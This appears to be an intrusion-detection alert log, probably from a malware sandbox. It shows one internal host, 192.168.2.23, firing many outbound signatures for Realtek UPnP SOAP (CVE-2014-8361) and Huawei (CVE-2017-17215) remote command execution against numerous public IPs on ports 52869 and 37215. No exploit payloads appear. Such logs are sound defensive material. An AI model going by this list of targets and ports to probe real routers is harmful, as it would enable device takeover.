                                      07/20/24-23:02:00.198960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5108052869192.168.2.23212.62.106.68
                                      07/20/24-23:01:08.638879TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23675252869192.168.2.2380.176.127.107
                                      07/20/24-23:00:59.191389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4395637215192.168.2.23197.16.71.7
                                      07/20/24-23:02:05.036436TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24957252869192.168.2.2357.22.35.81
                                      07/20/24-23:01:56.910590TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4670252869192.168.2.23128.36.26.52
                                      07/20/24-23:02:15.172220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615033652869192.168.2.23133.103.41.145
                                      07/20/24-23:01:42.717611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5628252869192.168.2.23201.170.107.7
                                      07/20/24-23:01:07.114267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881837215192.168.2.23157.195.69.11
                                      07/20/24-23:01:31.313163TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24823052869192.168.2.23109.17.111.246
                                      07/20/24-23:02:04.942554TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23878052869192.168.2.2370.135.187.127
                                      07/20/24-23:01:42.612377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3853252869192.168.2.2385.109.146.148
                                      07/20/24-23:01:42.688831TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25826652869192.168.2.2353.13.47.10
                                      07/20/24-23:02:04.577562TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5299252869192.168.2.23178.246.190.193
                                      07/20/24-23:01:00.634497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4136637215192.168.2.23197.37.15.231
                                      07/20/24-23:01:20.593640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5857452869192.168.2.23140.34.53.233
                                      07/20/24-23:01:51.956762TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4252452869192.168.2.23164.23.204.131
                                      07/20/24-23:01:26.004683TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613852052869192.168.2.2314.200.138.62
                                      07/20/24-23:01:44.550538TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4907452869192.168.2.23167.144.253.27
                                      07/20/24-23:01:07.018425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500437215192.168.2.2341.171.209.210
                                      07/20/24-23:01:10.863362TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613622652869192.168.2.23106.229.130.40
                                      07/20/24-23:01:57.549758TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5082452869192.168.2.2349.127.162.127
                                      07/20/24-23:02:22.606515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4834852869192.168.2.23176.129.124.225
                                      07/20/24-23:01:02.773260TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613856452869192.168.2.23205.29.56.156
                                      07/20/24-23:01:26.226478TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615102452869192.168.2.23103.227.74.238
                                      07/20/24-23:01:45.182071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3541052869192.168.2.2357.119.169.7
                                      07/20/24-23:01:27.664887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815037215192.168.2.23197.146.248.19
                                      07/20/24-23:01:52.720788TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615070652869192.168.2.23216.216.135.51
                                      07/20/24-23:01:59.855159TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613461052869192.168.2.23188.131.252.163
                                      07/20/24-23:01:31.321189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25823652869192.168.2.23103.96.50.123
                                      07/20/24-23:01:41.260372TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4963452869192.168.2.23111.66.162.186
                                      07/20/24-23:01:42.704266TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614934052869192.168.2.23113.71.166.108
                                      07/20/24-23:01:46.604394TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5678052869192.168.2.23156.160.38.108
                                      07/20/24-23:01:08.668802TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25295852869192.168.2.23184.77.18.239
                                      07/20/24-23:01:44.389834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5660452869192.168.2.23111.229.109.170
                                      07/20/24-23:01:24.475794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4818852869192.168.2.23162.229.91.161
                                      07/20/24-23:00:59.157444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799637215192.168.2.23157.75.190.222
                                      07/20/24-23:01:45.923449TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3899652869192.168.2.23169.122.121.121
                                      07/20/24-23:02:01.320867TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6001452869192.168.2.23144.39.142.95
                                      07/20/24-23:02:09.263272TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23988852869192.168.2.23149.74.6.111
                                      07/20/24-23:01:08.572197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5529652869192.168.2.23173.57.134.38
                                      07/20/24-23:01:41.496780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5318052869192.168.2.2377.77.166.196
                                      07/20/24-23:01:02.721182TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6091252869192.168.2.23114.190.123.93
                                      07/20/24-23:01:45.037292TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615668652869192.168.2.23186.231.211.62
                                      07/20/24-23:01:47.304504TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4365652869192.168.2.2369.202.155.168
                                      07/20/24-23:01:04.039128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172437215192.168.2.2341.167.36.239
                                      07/20/24-23:01:20.157619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004837215192.168.2.2319.104.128.245
                                      07/20/24-23:00:57.220954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406437215192.168.2.23221.200.167.164
                                      07/20/24-23:01:50.759828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3597652869192.168.2.23130.253.20.234
                                      07/20/24-23:01:44.446628TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4860452869192.168.2.23130.167.196.86
                                      07/20/24-23:01:26.110241TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613577052869192.168.2.23212.202.137.63
                                      07/20/24-23:01:34.045144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830037215192.168.2.23197.102.42.235
                                      07/20/24-23:02:10.141900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3888252869192.168.2.23201.77.215.250
                                      07/20/24-23:00:59.191389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740837215192.168.2.23197.6.34.101
                                      07/20/24-23:01:31.312895TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4277052869192.168.2.23178.214.207.137
                                      07/20/24-23:01:49.525770TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613652052869192.168.2.23179.230.186.151
                                      07/20/24-23:01:44.338159TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24288652869192.168.2.2324.0.173.57
                                      07/20/24-23:01:04.100971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912437215192.168.2.23197.22.178.158
                                      07/20/24-23:00:59.158279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706037215192.168.2.23157.30.105.107
                                      07/20/24-23:01:46.293475TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24597852869192.168.2.23223.217.31.58
                                      07/20/24-23:01:06.996055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124837215192.168.2.2341.231.52.21
                                      07/20/24-23:01:48.547161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3636252869192.168.2.2390.150.161.105
                                      07/20/24-23:01:08.565610TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5003452869192.168.2.2360.63.234.192
                                      07/20/24-23:01:42.093693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3819252869192.168.2.23163.215.30.136
                                      07/20/24-23:01:14.203011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5224437215192.168.2.23157.84.128.158
                                      07/20/24-23:01:24.885849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749637215192.168.2.23157.164.236.148
                                      07/20/24-23:01:49.412594TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4772852869192.168.2.23117.131.224.39
                                      07/20/24-23:02:05.374045TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615460252869192.168.2.23209.233.186.203
                                      07/20/24-23:01:13.192248TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6078252869192.168.2.2375.68.195.20
                                      07/20/24-23:01:51.197215TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615249452869192.168.2.23120.23.234.48
                                      07/20/24-23:01:14.049603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585437215192.168.2.23157.40.222.217
                                      07/20/24-23:01:08.578116TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23393852869192.168.2.23188.112.254.56
                                      07/20/24-23:01:44.921789TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25321652869192.168.2.2334.198.8.37
                                      07/20/24-23:01:01.516827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615737052869192.168.2.2370.59.242.166
                                      07/20/24-23:01:02.048214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467037215192.168.2.2341.178.90.216
                                      07/20/24-23:01:56.809584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24880052869192.168.2.231.7.30.66
                                      07/20/24-23:01:00.634089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871437215192.168.2.2341.99.7.194
                                      07/20/24-23:01:25.522869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3910652869192.168.2.23105.131.75.237
                                      07/20/24-23:01:11.828422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835037215192.168.2.23197.139.101.249
                                      07/20/24-23:01:42.357440TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5313852869192.168.2.23207.162.61.245
                                      07/20/24-23:01:43.020186TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615896852869192.168.2.2323.210.80.134
                                      07/20/24-23:01:46.159165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4316052869192.168.2.23172.42.36.143
                                      07/20/24-23:01:00.639093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315837215192.168.2.23197.197.73.14
                                      07/20/24-23:01:02.060344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001437215192.168.2.23197.27.25.91
                                      07/20/24-23:01:42.619336TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613401852869192.168.2.2342.202.134.116
                                      07/20/24-23:01:55.536863TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24947852869192.168.2.2396.112.20.112
                                      07/20/24-23:01:52.242138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4711852869192.168.2.238.220.8.58
                                      07/20/24-23:01:12.861753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4349852869192.168.2.23144.152.137.9
                                      07/20/24-23:01:24.618795TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3889452869192.168.2.2339.181.226.152
                                      07/20/24-23:01:45.261796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614741252869192.168.2.23162.239.164.172
                                      07/20/24-23:01:42.908066TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614624852869192.168.2.23147.72.210.150
                                      07/20/24-23:01:52.171350TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4483452869192.168.2.2375.3.82.5
                                      07/20/24-23:01:44.020551TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614553252869192.168.2.2358.172.86.110
                                      07/20/24-23:01:44.514415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4063852869192.168.2.2358.25.190.68
                                      07/20/24-23:01:44.814790TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615502252869192.168.2.23119.211.191.173
                                      07/20/24-23:01:47.798104TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614415252869192.168.2.23192.50.131.250
                                      07/20/24-23:01:55.105161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614033252869192.168.2.2362.211.74.184
                                      07/20/24-23:02:09.106165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4576652869192.168.2.2358.172.86.110
                                      07/20/24-23:00:57.222090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135437215192.168.2.23197.93.123.78
                                      07/20/24-23:01:02.109665TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4088252869192.168.2.2391.33.144.77
                                      07/20/24-23:01:42.519318TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25179052869192.168.2.238.226.239.105
                                      07/20/24-23:01:20.131339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5050437215192.168.2.23197.233.197.166
                                      07/20/24-23:01:46.877606TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613474652869192.168.2.2397.235.141.174
                                      07/20/24-23:01:20.144672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960837215192.168.2.23161.37.173.233
                                      07/20/24-23:01:21.952783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667237215192.168.2.2341.202.148.115
                                      07/20/24-23:01:34.053062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324837215192.168.2.2341.4.72.224
                                      07/20/24-23:01:47.990801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4399252869192.168.2.23208.128.19.202
                                      07/20/24-23:01:44.611556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615355252869192.168.2.23144.196.193.162
                                      07/20/24-23:02:00.376572TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25153852869192.168.2.2380.92.70.69
                                      07/20/24-23:01:24.876750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5798037215192.168.2.2390.31.237.217
                                      07/20/24-23:01:43.903732TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23439052869192.168.2.23178.242.0.237
                                      07/20/24-23:01:13.321371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4911652869192.168.2.2378.146.199.168
                                      07/20/24-23:01:59.593868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4256452869192.168.2.23118.42.225.58
                                      07/20/24-23:01:41.347676TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615251252869192.168.2.23153.109.210.254
                                      07/20/24-23:01:43.498157TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5696652869192.168.2.23199.90.7.168
                                      07/20/24-23:00:59.201033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348237215192.168.2.23198.254.9.254
                                      07/20/24-23:01:21.931985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6065037215192.168.2.23157.111.51.3
                                      07/20/24-23:01:47.902509TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25086852869192.168.2.2348.202.169.141
                                      07/20/24-23:01:31.978142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6057837215192.168.2.23197.39.192.146
                                      07/20/24-23:01:45.827400TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4106252869192.168.2.23126.163.211.196
                                      07/20/24-23:01:01.371551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4325652869192.168.2.23206.208.92.27
                                      07/20/24-23:01:08.668802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6021252869192.168.2.23128.89.159.185
                                      07/20/24-23:01:44.565131TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25495252869192.168.2.2335.100.148.20
                                      07/20/24-23:01:41.340201TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5692452869192.168.2.23182.49.153.25
                                      07/20/24-23:01:41.370228TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615864252869192.168.2.2348.9.123.124
                                      07/20/24-23:01:45.108910TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3611052869192.168.2.23203.219.226.207
                                      07/20/24-23:01:43.328792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5067652869192.168.2.23174.138.8.92
                                      07/20/24-23:01:43.167781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3347052869192.168.2.2364.212.158.191
                                      07/20/24-23:01:02.055683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109837215192.168.2.23156.104.182.219
                                      07/20/24-23:01:24.885895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141237215192.168.2.2346.35.149.243
                                      07/20/24-23:01:04.098909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4914237215192.168.2.23157.69.249.104
                                      07/20/24-23:01:12.805765TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3528252869192.168.2.23131.120.226.33
                                      07/20/24-23:01:04.098080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5613637215192.168.2.2341.150.236.246
                                      07/20/24-23:01:53.357099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5304452869192.168.2.23167.225.20.24
                                      07/20/24-23:00:57.221145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401437215192.168.2.23143.179.199.146
                                      07/20/24-23:01:51.290014TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24112452869192.168.2.2374.243.121.184
                                      07/20/24-23:02:06.083203TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5103652869192.168.2.2331.110.77.22
                                      07/20/24-23:01:21.928521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3859637215192.168.2.235.7.138.144
                                      07/20/24-23:01:00.641498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5106237215192.168.2.23197.12.203.6
                                      07/20/24-23:01:42.769238TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3758452869192.168.2.23177.147.32.222
                                      07/20/24-23:01:24.876750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618637215192.168.2.23157.230.17.56
                                      07/20/24-23:01:32.046652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235437215192.168.2.23157.109.141.179
                                      07/20/24-23:02:20.005310TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615068252869192.168.2.23154.161.89.111
                                      07/20/24-23:01:01.363756TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614526852869192.168.2.23109.80.210.12
                                      07/20/24-23:01:27.668073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014437215192.168.2.23197.43.247.234
                                      07/20/24-23:01:31.328855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4495052869192.168.2.2336.230.221.168
                                      07/20/24-23:01:31.986571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4195837215192.168.2.23157.195.52.119
                                      07/20/24-23:01:01.630356TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615684052869192.168.2.2342.114.143.158
                                      07/20/24-23:01:07.062666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685637215192.168.2.23197.191.219.145
                                      07/20/24-23:01:24.883171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034237215192.168.2.23197.77.35.64
                                      07/20/24-23:01:49.035612TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5954052869192.168.2.2372.136.42.217
                                      07/20/24-23:01:41.474539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4939452869192.168.2.2319.135.72.216
                                      07/20/24-23:01:14.103467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823237215192.168.2.23197.92.118.78
                                      07/20/24-23:02:01.280564TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614199652869192.168.2.23157.246.241.121
                                      07/20/24-23:01:43.203681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961652869192.168.2.23169.102.32.106
                                      07/20/24-23:01:43.185498TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25960452869192.168.2.2348.248.156.6
                                      07/20/24-23:02:37.123706TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3691452869192.168.2.23123.137.152.162
                                      07/20/24-23:01:02.504282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4392852869192.168.2.23169.107.25.12
                                      07/20/24-23:01:51.785967TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3718252869192.168.2.23116.126.39.243
                                      07/20/24-23:01:04.098909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344837215192.168.2.23157.156.131.187
                                      07/20/24-23:01:00.633633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713837215192.168.2.23197.229.227.49
                                      07/20/24-23:01:10.763630TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613686052869192.168.2.23104.80.144.32
                                      07/20/24-23:01:53.494330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6081252869192.168.2.23115.121.114.198
                                      07/20/24-23:01:43.020186TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4845452869192.168.2.2371.205.8.144
                                      07/20/24-23:01:49.011895TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25283252869192.168.2.23144.14.202.149
                                      07/20/24-23:01:44.670958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614282652869192.168.2.23105.232.226.131
                                      07/20/24-23:01:46.384516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5489052869192.168.2.2314.96.36.55
                                      07/20/24-23:01:04.982233TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3392452869192.168.2.23168.229.219.185
                                      07/20/24-23:01:40.355589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932037215192.168.2.23130.2.207.228
                                      07/20/24-23:01:01.772213TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5797852869192.168.2.23184.112.202.180
                                      07/20/24-23:01:57.787786TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614199252869192.168.2.23188.56.34.102
                                      07/20/24-23:01:24.898476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572437215192.168.2.2373.38.236.100
                                      07/20/24-23:01:43.164529TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23591052869192.168.2.2385.91.68.35
                                      07/20/24-23:00:59.211046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281237215192.168.2.2341.248.83.42
                                      07/20/24-23:01:11.636599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870437215192.168.2.23197.174.117.103
                                      07/20/24-23:01:08.590937TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23412452869192.168.2.23196.57.233.80
                                      07/20/24-23:01:08.668802TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23825652869192.168.2.23205.187.52.139
                                      07/20/24-23:01:00.637175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430237215192.168.2.23197.133.25.253
